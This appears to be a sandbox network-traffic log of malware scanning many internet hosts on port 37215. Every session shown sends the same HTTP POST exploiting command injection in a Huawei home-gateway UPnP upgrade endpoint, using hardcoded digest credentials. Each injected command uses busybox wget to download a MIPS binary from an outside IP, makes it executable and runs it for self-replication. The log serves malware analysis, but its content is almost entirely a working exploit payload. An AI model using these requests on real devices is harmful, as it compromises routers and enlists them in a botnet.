                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        656192.168.2.2350476157.165.217.21137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.494810104 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        657192.168.2.234333241.224.14.14237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.494868994 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        658192.168.2.2349000197.146.79.16637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.494890928 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        659192.168.2.2350768197.50.250.8237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.494890928 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        660192.168.2.2349702197.57.77.14937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.494950056 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        661192.168.2.2337140197.167.55.22637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.494983912 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        662192.168.2.2358788157.216.100.24637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.495013952 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        663192.168.2.2334896157.38.107.10437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.495066881 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        664192.168.2.2353438157.210.4.18137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.495810032 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        665192.168.2.2350814157.131.62.9737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.495810032 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
